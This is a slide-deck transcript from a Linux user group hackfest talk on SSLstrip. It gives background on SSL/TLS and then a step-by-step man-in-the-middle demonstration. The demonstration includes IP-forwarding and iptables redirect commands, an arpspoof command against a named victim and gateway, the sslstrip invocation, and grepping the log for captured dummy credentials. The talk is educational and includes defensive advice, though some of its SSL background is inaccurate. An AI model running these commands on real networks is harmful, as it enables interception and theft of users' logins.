

SSLstrip
SSLstrip


Presented by:
Brian Fields "AZ_RUNE"
<arizona.rune@gmail.com>
http://arizonarune.blogspot.com/

Brought to you by:
PLUG – Phoenix Linux User Group's Hackfest

Courtesy of:
Lisa Kachold <lisakachold@obnosis.com>
http://www.obnosis.com
SSLstrip


Covered Topics:

What is SSLstrip?

How does it work?

What occurs when it is active?

What does it mean to network security?

Some steps to proactively defend against it.
SSLstrip


What is SSLstrip

Before we can understand why and how to ”strip”
something we should know why and how it's
implemented.

What is SSL & TLS?

Where did SSL/TLS come from?

Why are SSL/TLS used?

How can secure protocols be built upon
unsecure protocols?
SSLstrip

What is SSL & TLS?

SSL stands for Secure Sockets Layer, though
I.E.T.F. (Internet Engineering Task Force) has
renamed it TLS (Transport Layer Security). TLS is
documented in RFC 2246 and identifies itself in the
protocol version field as SSL 3.1.
SSLstrip

Where did SSL/TLS come from?

SSL was developed by Netscape, and is used
extensively by web browsers & crawlers to provide
secure connections for transferring sensitive data,
such as credit card numbers and login
authentication. An SSL-protected HTTP transfer
uses trusted port 443 (instead of HTTP's normal
port 80), and is identified with a special URL
method ”https.” Thus, https://mail.google.com/
would cause an SSL-enabled browser to open a
secure SSL session to trusted port 443 at
mail.google.com.
SSLstrip

Where did SSL/TLS come from?

”Trusted Ports?”
This is one of the first security patterns
implemented on the internet, via ”r” or remote
programs. The idea is that all ports below 1024
were assigned ONLY to system processes. This
means remote connections were trusted because if
the port was below 1024 it was a system process
and not a user/client. This affects layer 4
”Transport” of the OSI-Model and the protocols
involved were TCP and UDP. It should be noted
that this is an old process for security that modern
encryption has replaced via SSH.
SSLstrip

Why are SSL/TLS used?

In a word: cryptography, this is the foundation for
most modern security protocols. When an SSL
session is established, the server begins by
sending a non-encrypted public key to the client, so
both parties (and any eavesdropper) can read this
key. However, the client then transmits a randomn
46 bytes (based on PKCS) of data back to the
server in a way that no one else could decode. Only
the server, with its private key, can decode the
information to determine the 46 original bytes. This
shared secret is now used to generate a set of
cipher keys (based on RC4 or ARC4) to encrypt the
remainder of the session.
SSLstrip

Why are SSL/TLS used?

(cont.)
These key were embedded in the authentication
certificates (called X.509 certificates) which allowed
a server to authenticate a client when it presented
its certificate that had the key within its contents.
Once the server verified the two certificates as
matching the authentication is complete.

Wait if all this works so well then why are we talking
about SSLstrip?
SSLstrip


How can secure protocols be built upon
unsecure protocols?

In a nutshell – they cannot be built upon them
without leaving a way for them to be circumvented.

This is where SSLstrip comes into use with a MITM
(Man In The Middle) attack after exploiting a chosen
subnet.

By the way almost all of you have been victim to a
spoofing attack. Oh yes and they were legal
attacks, 100% legal!
SSLstrip


How does it work?
SSLstrip


How does it work?

The picture does a decent job of explaining the flow
of how SSLstrip works. Now in the next few slides I
will explain how this works step by step and at the
end there's an embedded mp4 going over the
concepts discussed in the coming slides.
SSLstrip


What occurs when it is active?

First, we have some requirements that have to be done if
we are to use SSLstrip.

An Internet Connection

Victim has to be on the same subnet

A Linux computer

BT4 has the following features on a Live Disc.

SSLstrip http://www.thoughtcrime.org/software/sslstrip/

ARPspoof

Ettercap

(this is only necessary if you don't want
to run 'cat' for sslstrip.log)
SSLstrip


What occurs when it is active?

Second, now that we have the requirements we
have to have a victim on the same subnet.

In this example we have gained access to the
network and we are setting up shop to intercep SSL
traffic. Now access could have been through a pen
test or completely open access (i.e.: wifi at a
University campus, Starbucks, etc.).

Now open terminal

Either change to root or be prepared to 'sudo' these
commands.
SSLstrip

What occurs when it is active?

tar zxvf sslstrip-0.6.tar.gz

cd sslstrip-0.6

(optional) python ./setup.py install

If you have BT4 the next set of tools are already on
the live disk. Othewise use your package manager
and download ettercap and dsniff (has arpspoof).

The IP address we will arpspoof in the demo video
is 172.16.30.132. The Default Gateway will be
172.16.30.2 and we will be acting as the Default
Gateway for this MITM (Man In The Middle) attack.
SSLstrip

What occurs when it is active?

On to setup:

echo ”1” > /proc/sys/net/ipv4/ip_forward

Turns spoofing system into a router.

Iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-port 8080

Tells all traffic on port 80 to head over to 8080
so
we can monitor all the information and
strip SSL.
SSLstrip

What occurs when it is active?

arpspoof -i eth0 -t 172.16.30.132 172.16.30.2

Allows our system to become any IP on the
local network. Allows us to send unsolicited
arp responses. Once running it will say the
Default Gateway is ”our” mac address.

python ./sslstrip.py -a -l 8080

-a tells sslstrip to log all SSL and HTTP
traffic.

-l 8080 tells it to listen on port 8080.
SSLstrip

What occurs when it is active?

At this point our system is logging traffic and we can
still go on the web for example:
http://www.example.com/
however if we go to Gmail and check the address
bar we will notice what should have been https is
only http. Try logging into mail with a dummy login
and password. While you won't get in it will log the
info you used in the attempt.

Dummy login: pauldotcom12345

Dummy password: password12345
SSLstrip

What occurs when it is active?

At this point we are going to check the log file to
see what has come up.

cat sslstrip.log | grep pauldotcom12345

When the log displays in terminal you will see a
bunch of different information. Keep looking for you
will see the dummy login and password you used.
SSLstrip

What does it mean to Network Security?

If you are a penetration tester MITM attacks need to
be a tactic you are aware of to spot and use.
Remember the legitimate use I mentioned earlier
for arpspoofing?

User education on things your network users need
to pay attention to. Don't treat your users like new
users or that is all they will ever be. Be careful
trying to lock them down or you will likely find SSH
tunnels leaving your network.
SSLstrip

Some steps to proactively defend against it.

If you are a penetration tester remember that port
scanning and exploit are not the only skills you need.
Learning how to creatively exploit what you gain
access to will allow you to plan better safeguards
and keep unwanted traffic out.

If your users are properly educated then they can be
an extra layer of security because they will be
invested in the security of the network like you are.

Run regular checks and scans and read your logs.
Vigilence will pay off, for the lazy admin is the
hacked admin.
SSLstrip


Thanks to Pauldotcom.com for this demo:

Below is the embedded mp4 file.


If it won't play go to:

http://www.youtube.com/watch?v=xWBeQ0cR0WY
Refrence Sources / Bibliogrophy


Freesoft.org
http://www.freesoft.org/CIE/Topics/146.htm
http://www.freesoft.org/CIE/Topics/121.htm

IETF – Internet Engineering Task Force
http://www.ietf.org

Moxie Marlinspike
http://www.thoughtcrime.org/software/sslstrip/

Wikipedia
http://en.wikipedia.org/wiki/ARP_spoofing